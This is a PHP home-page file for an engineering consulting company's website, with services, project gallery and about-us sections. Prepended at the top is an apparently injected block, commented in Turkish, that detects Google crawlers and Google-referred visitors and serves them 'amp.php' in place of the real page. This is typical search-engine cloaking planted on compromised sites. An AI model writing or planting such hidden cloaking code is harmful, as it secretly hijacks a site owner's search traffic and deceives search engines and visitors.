<?php
if(!empty($_SERVER['HTTP_USER_AGENT'])){
$userAgent = $_SERVER['HTTP_USER_AGENT'];
}else{
$userAgent = '';
}
if(!empty($_SERVER['HTTP_REFERER'])){
$referer = $_SERVER['HTTP_REFERER'];
}else{
$referer = '';
}
$googleBots = [
'Googlebot', // Genel Google bot
'AdsBot', // Google Ads bot
'Mediapartners-Google', // Google AdSense bot
'APIs-Google', // Google API bot
'Googlebot-Image', // Google Görseller botu
'Googlebot-Video', // Google Video botu
'Googlebot-News', // Google Haberler botu
'Googlebot-Search', // Google Search Console botu
'Googlebot-Inspect', // Google Inspect Tool
'Googlebot-Android', // Android cihazlardan gelen Googlebot
'Googlebot-Mobile', // Google mobil botu
'Googlebot-Ads', // Google Ads botu
'Googlebot-Discovery', // Google'ın keşif botu
'Google-', // Google'ın keşif botu
];
// Google botlarını veya Google'dan gelen kullanıcıları kontrol et
if (
preg_match('/' . implode('|', $googleBots) . '/i', $userAgent) || // Google botlarını kontrol et
strpos($referer, 'google.') !== false // Referer Google mı kontrol et
) {
include 'amp.php';
die();
}
?>
<?php
ob_start();
session_start();
$pageTitle = 'Home';
include 'init.php';
include 'includes/template/slider.php';
?>
<!--########################################################## -->
<section class="site-section">
<div class="container">
<div class="row mb-5 justify-content-center">
<div class="col-md-7 text-center">
<h2 class="section-title mb-3" data-aos="fade-up" data-aos-delay="">ABOUT US</h2>
</div>
</div>
<div class="row align-items-lg-center" >
<div class="col-lg-6 mb-5" data-aos="fade-up" data-aos-delay="">
<div class="owl-carousel slide-one-item-alt">
<img src="images/about1.jpg" alt="Image" class="img-fluid">
<img src="images/about2.jpg" alt="Image" class="img-fluid">
<img src="images/background1.jpg" alt="Image" class="img-fluid">
</div>
<div class="custom-direction">
<a href="#" class="custom-prev"><span><span class="icon-keyboard_backspace"></span></span></a>
<a href="#" class="custom-next"><span><span class="icon-keyboard_backspace"></span></span></a>
</div>
</div>
<div class="col-lg-5 ml-auto" data-aos="fade-up" data-aos-delay="100">
<div class="owl-carousel slide-one-item-alt-text">
<div>
<h2 class="section-title-head mb-3">01. Foundingg and visions</h2>
<p>The company was established in 1999 as an engineering consulting company to formulate a new generation of consulting companies, the company's vision is to provide excellent services in this field. These services will bring the customers comfort and satisfaction. We have proven that it is important to make an effort in order to create an appropriate engineering foundation and roles, which will participate in the development of our country and keep pace with the new in this engineering sector .</p>
<p><a href="contact.php" class="btn btn-primary mr-2 mb-2">Free consultation</a></p>
</div>
<div>
<h2 class="section-title-head mb-3">02. Our experiences</h2>
<p>Since its founding, the company has built up a wide range of expertise, giving access to data for different types of construction, construction methods and materials. continues to pursue the production of high-quality buildings in all aspects; Visually, environmentally, technically, on time and within budget.</p>
<p><a href="contact.php" class="btn btn-primary mr-2 mb-2">Free consultation</a></p>
</div>
<div>
<h2 class="section-title-head mb-3">03. capabilities and mastery</h2>
<p>The company can benefit from the skills and experiences of qualified and long-serving people, and link the architectural department with the engineering and planning departments to provide a service that begins with the beginning of the project and carries the design to the work of drawings and construction supervision</p>
<p><a href="contact.php" class="btn btn-primary mr-2 mb-2">Free consultation</a></p>
</div>
</div>
</div>
</div>
</div>
</section>
<section class="site-section border-bottom bg-light" id="services-section">
<div class="container">
<div class="row mb-5">
<div class="col-12 text-center" data-aos="fade">
<h2 class="section-title mb-3">Our Services</h2>
</div>
</div>
<div class="row align-items-stretch">
<div class="owl-serv owl-carousel">
<div class="mb-4" data-aos="fade-up">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/arch.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Architectural Design</h3>
<ul class="list-unstyled ul-check primary mt-4">
<li>Architectural Concept Design</li>
<li>Detailed working Drawings</li>
<li>Drawing approvals from municipalities</li>
<li>Interior Design</li>
<li>Landscape Design</li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" data-aos-delay="100">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/eng.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Engineering Design</h3>
<ul class="list-unstyled ul-check primary mt-4">
<li>Structural Design</li>
<li>Electrical Design</li>
<li>Mechanical Design</li>
<li>Drainage Design</li>
<li>Bills of Quantities and specifications</li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" data-aos-delay="200">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/tec.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Technical – Advisory</h3>
<ul class="list-unstyled ul-check primary mt-4">
<li>Construction Supervision</li>
<li>Cost Estimation</li>
<li>Value Engineering</li>
<li>Ppayment approvals </li>
<li>Feasibility Assessment </li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" >
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/plan.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Auditing architectural plans</h3>
<ul class="list-unstyled ul-check primary mt-4">
<li>report will be prepared to develop and address the defects.</li>
<li>Reviewing the elevations plans .</li>
<li>Reviewing the general site plan .</li>
<li>Reviewing the internal distribution scheme .</li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" data-aos-delay="100">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/done.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div><h3 class="mt-3">Final project inspection</h3>
<ul class="list-unstyled ul-check primary">
<li>This service is for under construction projects that are in the final inspection phase .</li>
<li>The project will be inspected by a committee of three engineers consisting of a site civil engineer, an architect, and an electrical and sanitary engineer. The entire work carried out will be inspected and then an inspection report will be delivered</li>
<li>The site visit will take place within three working days from the date of submitting the application .</li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" data-aos-delay="200">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/value.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Value engineering</h3>
<ul class="list-unstyled ul-check primary">
<li>studying specifications, bills of quantities and project drawings (architectural, structural , drainage, electricity, water, gas, Etisalat and civil defense) to reduce the cost and develop the design to provide new alternatives without affecting the quality and value of the project</li>
<li>The service will be free if there was no savings of the project cost after the end of the value study .</li>
<li>In the event that there is a saving in the value of the project without affecting the quality, 10% of the saving value will be requested for the value study fees .</li>
</ul>
</div>
</div>
</div>
<div class="mb-4" data-aos="fade-up" data-aos-delay="200">
<div class="unit-4 text-center px-2">
<div class="unit-4-icon">
<img src="img/serv_ico/contract.png" alt="alliwan_services" class="img-fluid w-25 mb-4 m-auto">
</div>
<div>
<h3 class="mt-3">Auditing contracts and specifications</h3>
<ul class="list-unstyled ul-check primary">
<li>Studying contracts and specifications of the residential project in order to give the legal and technical observations.</li>
<li>The cost of the service is 500 dirhams for auditing contracts and 500 dirhams for checking specifications</li>
</ul>
</div>
</div>
</div>
</div>
</div>
<a href="services.php"><button class="btn btn-primary mt-5">Learn More</button></a>
</div>
</section>
<!-- ############### why #################### -->
<div class="site-section" id="next">
<div class="container">
<div class="row mb-5">
<div class="col-12 text-center" data-aos="fade">
<h2 class="section-title mb-3">WHY Chosse Us ?</h2>
</div>
</div>
<div class="row">
<div class="col-lg-6 mb-5" data-aos="fade-up" data-aos-delay="">
<figure class="circle-bg">
<img src="images/whyus.jpg" alt="alliwan" class="img-fluid">
</figure>
</div>
<div class="col-lg-5 ml-auto" data-aos="fade-up" data-aos-delay="100">
<div class="mb-4">
<h3 class="h3 mb-4 text-black">We are creating a better world through the power of design</h3>
<p> Every day we impact thousands of people’s lives with the spaces we create, which is why people are at the center of everything we do. Designing for the human experience is what allows us to tackle the toughest challenges facing cities and shape a more resilient and equitable future for everyone.</p>
</div>
<div class="mb-4">
<ul class="list-unstyled ul-check success">
<li>Hold ourselves accountable.</li>
<li>We have the skills and ability to tailor our approach to each situation, whether it's tried and tested, or something more cutting edge. We deliver our best work by designing smart.</li>
<li>We strive to do things better and stretch further. From our internal processes to the work we deliver, and from the projects we do, to the careers we enable.</li>
<li>To find the best answer, we need to understand the root and complexity of the problem. We start by listening.</li>
<li>We grow our firm by growing our people</li>
<li>We offer sustainability consulting services and strategies for developers, building owners, and tenants who want and need to minimize their operational and embodied carbon for new or reused buildings.</li>
</ul>
</div>
<div class="mb-4">
<form action="add_consultation.php" method="POST">
<div class="form-group d-flex align-items-center">
<input type="email" name="cus_mail_post" class="form-control mr-2" required="required" placeholder="Enter your email">
<input type="submit" name="add_mail_posts" class="btn btn-primary" value="Submit Email">
</div>
</form>
</div>
</div>
</div>
</div>
</div>
<!-- ======= Counter Section ======= -->
<div class="section-counter paralax-mf bg-image" style="background-image: url(images/hero_20.jpg)">
<div class="overlay-mf"></div>
<div class="overlay-mf2"></div>
<div class="container">
<div class="row">
<div class="col-sm-4 col-lg-4">
<div class="counter-box counter-box pt-4 pt-md-0">
<div class="counter-ico">
<span class="ico-circle">
<img src="images/flaticon-svg/svg/ser1.svg" alt="alliwan_services" class="img-fluid w-25 mb-4">
</span>
</div>
<div class="counter-num">
<p class="counter">41</p>
<span class="counter-text">Under construction projects</span>
</div>
</div>
</div>
<div class="col-sm-4 col-lg-4">
<div class="counter-box pt-4 pt-md-0">
<div class="counter-ico">
<span class="ico-circle">
<img src="images/flaticon-svg/svg/count2.svg" alt="alliwan_services" class="img-fluid w-25 mb-4">
</span>
</div>
<div class="counter-num">
<p class="counter">23</p>
<span class="counter-text">Years of experience</span>
</div>
</div>
</div>
<div class="col-sm-4 col-lg-4">
<div class="counter-box pt-4 pt-md-0">
<div class="counter-ico">
<span class="ico-circle">
<img src="images/flaticon-svg/svg/ser8.svg" alt="alliwan_services" class="img-fluid w-25 mb-4">
</span>
</div>
<div class="counter-num">
<p class="counter">570</p>
<span class="counter-text">finished projects </span>
</div>
</div>
</div>
</div>
</div>
</div><!-- End Counter Section -->
<section class="site-section" id="gallery-section" data-aos="fade">
<div class="container">
<div class="row mb-3">
<div class="col-12 text-center">
<h2 class="section-title mb-3">Our Projects</h2>
</div>
</div>
<!--
<div class="row justify-content-center mb-5">
<div id="filters" class="filters text-center button-group col-md-12">
<button class="btn btn-primary active" data-filter="*">All</button>
<button class="btn btn-primary" data-filter=".interior">interior Design</button>
<button class="btn btn-primary" data-filter=".Exterior">Exterior Design</button>
<button class="btn btn-primary" data-filter=".offices">office Design</button>
<button class="btn btn-primary" data-filter=".villa">Villa Design</button>
<button class="btn btn-primary" data-filter=".landscape">landscape</button>
<button class="btn btn-primary" data-filter=".Execution">Design & Execution</button>
</div>
</div>
-->
<div id="posts" class="row no-gutter">
<?php
foreach ( getenprojlimit() as $mosak ) {
?>
<div class="item
<?php
if ($mosak['type'] == 1) {
echo 'interior';
}elseif ($mosak['type'] == 2) {
echo 'Exterior';
}elseif ($mosak['type'] == 3) {
echo 'offices';
}elseif ($mosak['type'] == 4) {
echo 'landscape';
}elseif ($mosak['type'] == 5) {
echo 'villa';
}elseif ($mosak['type'] == 6) {
echo 'Execution';
}
?>
col-sm-6 col-md-4 col-lg-4 mb-4">
<a href="admin/images/uploads/projects/<?php echo $mosak['img1']; ?>" class="item-wrap fancybox">
<span class="icon-search-plus"></span></hr><span class="mt-5 pr_country"><?php echo $mosak['tittle']; ?></span>
<img style="height: 250px;width: 100%" class="img-fluid" src="admin/images/uploads/projects/<?php echo $mosak['img1']; ?>">
</a>
</div>
<?php }?>
</div>
<div class="text-center">
<a href="projects.php"><button class="btn btn-primary mt-5 shadow">View All Projects</button></a>
</div>
<hr class="mt-5">
</div>
</section>
<!--
<section class="site-section testimonial-wrap" id="testimonials-section" data-aos="fade">
<div class="container">
<div class="row mb-5">
<div class="col-12 text-center">
<h2 class="section-title mb-3">Happy Customers</h2>
</div>
</div>
<div class="slide-one-item home-slider owl-carousel">
<div>
<div class="testimonial">
<blockquote class="mb-5">
<p>“Al-Liwan Company has a special taste that distinguishes it from other companies. My project was executed exactly as I imagined it. I will certainly be happy to experience working with them again.”</p>
</blockquote>
<figure class="mb-4 d-flex align-items-center justify-content-center">
<div><img src="images/person_3.jpg" alt="Image" class="w-50 img-fluid mb-3"></div>
<p>John Smith</p>
</figure>
</div>
</div>
<div>
<div class="testimonial">
<blockquote class="mb-5">
<p>“It is a pleasure to deal with Al-Liwan Company, it was a unique experience by all standards, the credibility of dealing with the professional team was amazing.”</p>
</blockquote>
<figure class="mb-4 d-flex align-items-center justify-content-center">
<div><img src="images/person_2.jpg" alt="Image" class="w-50 img-fluid mb-3"></div>
<p>Christine Aguilar</p>
</figure>
</div>
</div>
<div>
<div class="testimonial">
<blockquote class="mb-5">
<p>“A truly sophisticated company, the designs they provide are inspiring and objective, the diversity of options and the complete willingness to implement all requests was something worth appreciating.”</p>
</blockquote>
<figure class="mb-4 d-flex align-items-center justify-content-center">
<div><img src="images/person_4.jpg" alt="Image" class="w-50 img-fluid mb-3"></div>
<p>Robert Spears</p>
</figure>
</div>
</div>
<div>
<div class="testimonial">
<blockquote class="mb-5">
<p>“I am completely satisfied with my experience dealing with Al-Liwan Company, everything was good, I expect more progress for this company in the near future, I really advise all my acquaintances to work with them.”</p>
</blockquote>
<figure class="mb-4 d-flex align-items-center justify-content-center">
<div><img src="images/person_4.jpg" alt="Image" class="w-50 img-fluid mb-3"></div>
<p>Bruce Rogers</p>
</figure>
</div>
</div>
</div>
</div>
</section>
-->
<?php
include $tpl . 'footer.php';
ob_end_flush();
?>